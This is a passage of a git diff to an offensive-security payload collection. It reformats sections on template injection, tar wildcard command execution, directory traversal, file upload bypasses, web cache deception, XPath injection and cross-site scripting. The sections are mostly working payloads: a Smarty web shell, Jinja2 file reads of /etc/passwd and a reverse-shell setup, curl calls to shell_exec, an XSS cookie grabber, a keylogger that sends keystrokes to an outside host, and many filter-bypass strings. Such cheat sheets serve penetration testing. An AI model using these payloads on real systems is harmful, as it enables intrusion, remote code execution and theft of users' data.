{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
```
|
||||
|
||||
|
||||
## Smarty
|
||||
|
||||
```python
|
||||
{php}echo `id`;{/php}
|
||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||
```
|
||||
|
||||
## Freemarker
|
||||
|
||||
Default functionality.
|
||||
|
||||
```python
|
||||
<#assign
|
||||
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
```
|
||||
|
||||
## Jade / Codepen
|
||||
|
||||
```python
|
||||
- var x = root.process
|
||||
- x = x.mainModule.require
|
||||
@ -92,6 +106,7 @@ ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
```
|
||||
|
||||
## Velocity
|
||||
|
||||
```python
|
||||
#set($str=$class.inspect("java.lang.String").type)
|
||||
#set($chr=$class.inspect("java.lang.Character").type)
|
||||
@ -104,6 +119,7 @@ $str.valueOf($chr.toChars($out.read()))
|
||||
```
|
||||
|
||||
## Mako
|
||||
|
||||
```python
|
||||
<%
|
||||
import os
|
||||
@ -112,13 +128,13 @@ x=os.popen('id').read()
|
||||
${x}
|
||||
```
|
||||
|
||||
|
||||
## Jinja2
|
||||
|
||||
[Official website](http://jinja.pocoo.org/)
|
||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||
|
||||
### Jinja 2 - Basic injection
|
||||
|
||||
### Basic injection
|
||||
```python
|
||||
{{4*4}}[[5*5]]
|
||||
{{7*'7'}} would result in 7777777
|
||||
@ -126,7 +142,9 @@ ${x}
|
||||
|
||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||
The above injections have been tested on Flask application.
|
||||
### Template format
|
||||
|
||||
### Jinja2 - Template format
|
||||
|
||||
```python
|
||||
{% extends "layout.html" %}
|
||||
{% block body %}
|
||||
@ -139,12 +157,14 @@ The above injections have been tested on Flask application.
|
||||
|
||||
```
|
||||
|
||||
### Dump all used classes
|
||||
### Jinja2 - Dump all used classes
|
||||
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
```
|
||||
|
||||
### Dump all config variables
|
||||
### Jinja2 - Dump all config variables
|
||||
|
||||
```python
|
||||
{% for key, value in config.iteritems() %}
|
||||
<dt>{{ key|e }}</dt>
|
||||
@ -152,23 +172,29 @@ The above injections have been tested on Flask application.
|
||||
{% endfor %}
|
||||
```
|
||||
|
||||
### Read remote file
|
||||
### Jinja2 - Read remote file
|
||||
|
||||
```python
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
```
|
||||
|
||||
### Write into remote file
|
||||
### Jinja2 - Write into remote file
|
||||
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||
```
|
||||
|
||||
### Remote Code Execution via reverse shell
|
||||
### Jinja2 - Remote Code Execution via reverse shell
|
||||
|
||||
Listen for connexion
|
||||
```
|
||||
|
||||
```bash
|
||||
nv -lnvp 8000
|
||||
```
|
||||
|
||||
Inject this template
|
||||
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||
@ -176,16 +202,19 @@ Inject this template
|
||||
```
|
||||
|
||||
## AngularJS
|
||||
### Basic injection
|
||||
|
||||
### AngularJS - Basic injection
|
||||
|
||||
```javascript
|
||||
$eval('1+1')
|
||||
{{1+1}}
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
@ -1,14 +1,19 @@
|
||||
# TAR Command Execution
|
||||
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.
|
||||
|
||||
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.
|
||||
|
||||
## Exploit
|
||||
|
||||
These files work against a "tar *"
|
||||
```
|
||||
|
||||
```powershell
|
||||
--checkpoint=1
|
||||
--checkpoint-action=exec=sh shell.sh
|
||||
shell.sh (your exploit code is here)
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
*
|
||||
|
||||
* [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||||
* [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
|
||||
* [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
|
@ -1,9 +1,12 @@
|
||||
# Traversal Directory
|
||||
|
||||
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic
|
||||
```
|
||||
|
||||
```powershell
|
||||
../
|
||||
..\
|
||||
..\/
|
||||
@ -17,27 +20,29 @@ Basic
|
||||
```
|
||||
|
||||
16 bit Unicode encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
. = %u002e
|
||||
/ = %u2215
|
||||
\ = %u2216
|
||||
```
|
||||
|
||||
Double URL encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
. = %252e
|
||||
/ = %252f
|
||||
\ = %255c
|
||||
\ = %255c
|
||||
```
|
||||
|
||||
UTF-8 Unicode encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
. = %c0%2e, %e0%40%ae, %c0ae
|
||||
/ = %c0%af, %e0%80%af, %c0%2f
|
||||
\ = %c0%5c, %c0%80%5c
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://twitter.com/huykha10/status/962419695470174208
|
||||
|
||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||
|
@ -1,16 +1,20 @@
|
||||
# Upload
|
||||
|
||||
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
|
||||
|
||||
## Exploits
|
||||
Image Tragik
|
||||
```
|
||||
|
||||
### Image Tragik
|
||||
|
||||
```powershell
|
||||
HTTP Request
|
||||
Reverse Shell
|
||||
Touch command
|
||||
```
|
||||
|
||||
PHP Extension
|
||||
```
|
||||
### PHP Extension
|
||||
|
||||
```powershell
|
||||
.php
|
||||
|
||||
Less known extension
|
||||
@ -24,26 +28,30 @@ Double extension
|
||||
.png.php
|
||||
```
|
||||
|
||||
PNG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
### PNG Bypass a resize
|
||||
|
||||
Upload the picture and use a local file inclusion
|
||||
|
||||
```powershell
|
||||
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
|
||||
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
|
||||
curl 'http://localhost/test.php?0=system' --data "1='ls'"
|
||||
```
|
||||
|
||||
JPG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
### JPG Bypass a resize
|
||||
|
||||
Upload the picture and use a local file inclusion
|
||||
|
||||
```powershell
|
||||
http://localhost/test.php?c=ls
|
||||
```
|
||||
|
||||
XSS via SWF
|
||||
```
|
||||
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
|
||||
### XSS via SWF
|
||||
|
||||
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
|
||||
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
|
||||
|
||||
Examples:
|
||||
|
||||
```powershell
|
||||
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||
|
||||
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||
@ -52,4 +60,5 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||
|
@ -1,26 +1,26 @@
|
||||
# Web Cache Deception Attack
|
||||
|
||||
## Exploit
|
||||
```
|
||||
1.Browser requests http://www.example.com/home.php/non-existent.css.
|
||||
2.Server returns the content of http://www.example.com/home.php, most probably with HTTP caching headers that instruct to not cache this page.
|
||||
3.The response goes through the proxy.
|
||||
4.The proxy identifies that the file has a css extension.
|
||||
5.Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
|
||||
```
|
||||
|
||||
1. Browser requests `http://www.example.com/home.php/non-existent.css`.
|
||||
2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page.
|
||||
3. The response goes through the proxy.
|
||||
4. The proxy identifies that the file has a css extension.
|
||||
5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
|
||||
|
||||
## Methodology of the attack - example
|
||||
```
|
||||
1. Normal browsing, visit home : https://www.example.com/myaccount/home/
|
||||
2. Open the malicious link : https://www.example.com/myaccount/home/malicious.css
|
||||
3. The page is displayed as /home and the cache is saving the page
|
||||
4. Open a private tab with the previous URL : https://www.paypal.com/myaccount/home/malicous.css
|
||||
5. The content of the cache is displayed
|
||||
```
|
||||
|
||||
[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
|
||||
1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
|
||||
2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css`
|
||||
3. The page is displayed as /home and the cache is saving the page
|
||||
4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
|
||||
5. The content of the cache is displayed
|
||||
|
||||
[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
|
||||
|
||||
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
@ -1,9 +1,12 @@
|
||||
# XPATH injection
|
||||
|
||||
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
||||
|
||||
## Exploitation
|
||||
Similar to SQL : "string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"
|
||||
```
|
||||
|
||||
Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
|
||||
|
||||
```sql
|
||||
' or '1'='1
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
@ -20,7 +23,8 @@ x' or name()='username' or 'x'='y
|
||||
```
|
||||
|
||||
## Blind Exploitation
|
||||
```
|
||||
|
||||
```sql
|
||||
1. Size of a string
|
||||
and string-length(account)=SIZE_INT
|
||||
|
||||
@ -29,7 +33,7 @@ substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
||||
|
@ -1,18 +1,20 @@
|
||||
# Cross Site Scripting
|
||||
|
||||
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
||||
|
||||
- [Exploit code or POC](#exploit-code-or-poc)
|
||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||
- [XSS in files](#xss-in-files)
|
||||
- [Polyglot XSS](#polyglot-xss)
|
||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||
- [Common WAF Bypas](#common-waf-bypass)
|
||||
- [Exploit code or POC](#exploit-code-or-poc)
|
||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||
- [XSS in files](#xss-in-files)
|
||||
- [Polyglot XSS](#polyglot-xss)
|
||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||
- [Common WAF Bypas](#common-waf-bypass)
|
||||
|
||||
## Exploit code or POC
|
||||
|
||||
Cookie grabber for XSS
|
||||
|
||||
```php
|
||||
<?php
|
||||
// How to use it
|
||||
@ -28,26 +30,30 @@ fclose($fp);
|
||||
```
|
||||
|
||||
Keylogger for XSS
|
||||
|
||||
```html
|
||||
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||||
```
|
||||
|
||||
More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
|
||||
- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
|
||||
- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
|
||||
- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
|
||||
- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
|
||||
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
|
||||
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
|
||||
|
||||
- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
|
||||
- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
|
||||
- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
|
||||
- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
|
||||
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
|
||||
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
|
||||
|
||||
## Identify an XSS endpoint
|
||||
|
||||
```javascript
|
||||
<script>debugger;</script>
|
||||
```
|
||||
|
||||
## XSS in HTML/Applications
|
||||
|
||||
XSS Basic
|
||||
|
||||
```javascript
|
||||
Basic payload
|
||||
<script>alert('XSS')</script>
|
||||
@ -75,6 +81,7 @@ Svg payload
|
||||
```
|
||||
|
||||
XSS for HTML5
|
||||
|
||||
```javascript
|
||||
<body onload=alert(/XSS/.source)>
|
||||
<input autofocus onfocus=alert(1)>
|
||||
@ -90,6 +97,7 @@ XSS for HTML5
|
||||
```
|
||||
|
||||
XSS using script tag (external payload)
|
||||
|
||||
```javascript
|
||||
<script src=14.rs>
|
||||
you can also specify an arbitratry payload with 14.rs/#payload
|
||||
@ -97,6 +105,7 @@ e.g: 14.rs/#alert(document.domain)
|
||||
```
|
||||
|
||||
XSS in META tag
|
||||
|
||||
```javascript
|
||||
Base64 encoded
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
@ -108,32 +117,37 @@ With an additional URL
|
||||
```
|
||||
|
||||
XSS in Hidden input
|
||||
|
||||
```javascript
|
||||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||||
Use CTRL+SHIFT+X to trigger the onclick event
|
||||
```
|
||||
|
||||
DOM XSS
|
||||
|
||||
```javascript
|
||||
#"><img src=/ onerror=alert(2)>
|
||||
```
|
||||
|
||||
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
||||
|
||||
```javascript
|
||||
-(confirm)(document.domain)//
|
||||
; alert(1);//
|
||||
```
|
||||
|
||||
XSS URL
|
||||
|
||||
```javascript
|
||||
URL/<svg onload=alert(1)>
|
||||
URL/<script>alert('XSS');//
|
||||
URL/<input autofocus onfocus=alert(1)>
|
||||
```
|
||||
|
||||
|
||||
## XSS in wrappers javascript and data URI
|
||||
|
||||
XSS with javascript:
|
||||
|
||||
```javascript
|
||||
javascript:prompt(1)
|
||||
|
||||
@ -160,6 +174,7 @@ javascript://anything%0D%0A%0D%0Awindow.alert(1)
|
||||
```
|
||||
|
||||
XSS with data:
|
||||
|
||||
```javascript
|
||||
data:text/html,<script>alert(0)</script>
|
||||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||||
@ -167,19 +182,23 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||||
```
|
||||
|
||||
XSS with vbscript: only IE
|
||||
|
||||
```javascript
|
||||
vbscript:msgbox("XSS")
|
||||
```
|
||||
|
||||
## XSS in files
|
||||
|
||||
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
|
||||
|
||||
```xml
|
||||
<name>
|
||||
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
||||
</name>
|
||||
```
|
||||
|
||||
XSS in XML
|
||||
|
||||
XSS in XML
|
||||
```xml
|
||||
<html>
|
||||
<head></head>
|
||||
@ -189,8 +208,8 @@ XSS in XML
|
||||
</html>
|
||||
```
|
||||
|
||||
|
||||
XSS in SVG
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
@ -204,32 +223,33 @@ XSS in SVG
|
||||
```
|
||||
|
||||
XSS in SVG (short)
|
||||
|
||||
```javascript
|
||||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||||
|
||||
|
||||
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
|
||||
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
|
||||
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
|
||||
```
|
||||
|
||||
XSS in SWF flash application
|
||||
```
|
||||
|
||||
```powershell
|
||||
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||
|
||||
|
||||
InsecureFlashFile.swf
|
||||
location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
|
||||
open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
|
||||
http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
|
||||
eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
|
||||
```
|
||||
|
||||
more payloads in ./files
|
||||
|
||||
|
||||
XSS in SWF flash application
|
||||
|
||||
```javascript
|
||||
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
|
||||
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
|
||||
@ -249,8 +269,8 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
||||
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
|
||||
```
|
||||
|
||||
|
||||
XSS in CSS
|
||||
|
||||
```html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
@ -268,29 +288,34 @@ div {
|
||||
</html>
|
||||
```
|
||||
|
||||
|
||||
## Polyglot XSS
|
||||
|
||||
Polyglot XSS - 0xsobky
|
||||
|
||||
```javascript
|
||||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||
```
|
||||
|
||||
Polyglot XSS - Ashar Javed
|
||||
|
||||
```javascript
|
||||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||||
```
|
||||
|
||||
Polyglot XSS - Mathias Karlsson
|
||||
|
||||
```javascript
|
||||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||||
```
|
||||
|
||||
Polyglot XSS - Rsnake
|
||||
|
||||
```javascript
|
||||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||||
```
|
||||
|
||||
Polyglot XSS - Daniel Miessler
|
||||
|
||||
```javascript
|
||||
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||||
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||||
@ -307,30 +332,34 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||
|
||||
Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
|
||||
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
|
||||
|
||||
```javascript
|
||||
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
|
||||
```
|
||||
|
||||
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
|
||||
|
||||
```javascript
|
||||
<svg%0Ao%00nload=%09((pro\u006dpt))()//
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Filter Bypass and exotic payloads
|
||||
|
||||
Bypass case sensitive
|
||||
|
||||
```javascript
|
||||
<sCrIpt>alert(1)</ScRipt>
|
||||
```
|
||||
|
||||
Bypass tag blacklist
|
||||
|
||||
```javascript
|
||||
<script x>
|
||||
<script x>alert('XSS')<script y>
|
||||
```
|
||||
|
||||
Bypass word blacklist with code evaluation
|
||||
|
||||
```javascript
|
||||
eval('ale'+'rt(0)');
|
||||
Function("ale"+"rt(1)")();
|
||||
@ -341,18 +370,20 @@ Set.constructor('ale'+'rt(13)')();
|
||||
Set.constructor`al\x65rt\x2814\x29```;
|
||||
```
|
||||
|
||||
|
||||
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
|
||||
|
||||
```javascript
|
||||
<img src='1' onerror='alert(0)' <
|
||||
```
|
||||
|
||||
Bypass quotes for string
|
||||
|
||||
```javascript
|
||||
String.fromCharCode(88,83,83)
|
||||
```
|
||||
|
||||
Bypass quotes in script tag
|
||||
|
||||
```javascript
|
||||
http://localhost/bla.php?test=</script><script>alert(1)</script>
|
||||
<html>
|
||||
@ -363,6 +394,7 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
|
||||
```
|
||||
|
||||
Bypass quotes in mousedown event
|
||||
|
||||
```javascript
|
||||
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
|
||||
|
||||
@ -370,38 +402,45 @@ You can bypass a single quote with ' in an on mousedown event handler
|
||||
```
|
||||
|
||||
Bypass dot filter
|
||||
|
||||
```javascript
|
||||
<script>window['alert'](document['domain'])<script>
|
||||
```
|
||||
|
||||
Bypass parenthesis for string - Firefox
|
||||
|
||||
```javascript
|
||||
alert`1`
|
||||
```
|
||||
|
||||
Bypass onxxxx= blacklist
|
||||
|
||||
```javascript
|
||||
<object onafterscriptexecute=confirm(0)>
|
||||
<object onbeforescriptexecute=confirm(0)>
|
||||
```
|
||||
|
||||
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
|
||||
|
||||
```javascript
|
||||
<img src='1' onerror\x00=alert(0) />
|
||||
<img src='1' onerror\x0b=alert(0) />
|
||||
```
|
||||
|
||||
Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
|
||||
|
||||
```javascript
|
||||
<img src='1' onerror/=alert(0) />
|
||||
```
|
||||
|
||||
Bypass space filter with "/" - IE/Firefox/Chrome/Safari
|
||||
|
||||
```javascript
|
||||
<img/src='1'/onerror=alert(0)>
|
||||
```
|
||||
|
||||
Bypass space filter with 0x0c/^L
|
||||
|
||||
```javascript
|
||||
<svgonload=alert(1)>
|
||||
|
||||
@ -411,13 +450,14 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
||||
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
|
||||
```
|
||||
|
||||
|
||||
Bypass document blacklist
|
||||
|
||||
```javascript
|
||||
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
|
||||
```
|
||||
|
||||
Bypass using javascript inside a string
|
||||
|
||||
```javascript
|
||||
<script>
|
||||
foo="text </script><script>alert(1)</script>";
|
||||
@ -425,6 +465,7 @@ foo="text </script><script>alert(1)</script>";
|
||||
```
|
||||
|
||||
Bypass using an alternate way to redirect
|
||||
|
||||
```javascript
|
||||
location="http://google.com"
|
||||
document.location = "http://google.com"
|
||||
@ -434,6 +475,7 @@ window['location']['href']="http://google.com"
|
||||
```
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
|
||||
|
||||
```javascript
|
||||
window['alert'](0)
|
||||
parent['alert'](1)
|
||||
@ -452,6 +494,7 @@ content['alert'](6)
|
||||
```
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
|
||||
|
||||
```javascript
|
||||
eval('ale'+'rt(0)');
|
||||
Function("ale"+"rt(1)")();
|
||||
@ -474,8 +517,8 @@ Set.constructor('ale'+'rt(13)')();
|
||||
Set.constructor`al\x65rt\x2814\x29```;
|
||||
```
|
||||
|
||||
|
||||
Bypass using an alternate way to trigger an alert
|
||||
|
||||
```javascript
|
||||
var i = document.createElement("iframe");
|
||||
i.onload = function(){
|
||||
@ -497,11 +540,13 @@ XSSObject.proxy(window, 'alert', 'window.alert', false);
|
||||
```
|
||||
|
||||
Bypass ">" using nothing #trololo (you don't need to close your tags)
|
||||
|
||||
```javascript
|
||||
<svg onload=alert(1)//
|
||||
```
|
||||
|
||||
Bypass ';' using another character
|
||||
|
||||
```javascript
|
||||
'te' * alert('*') * 'xt';
|
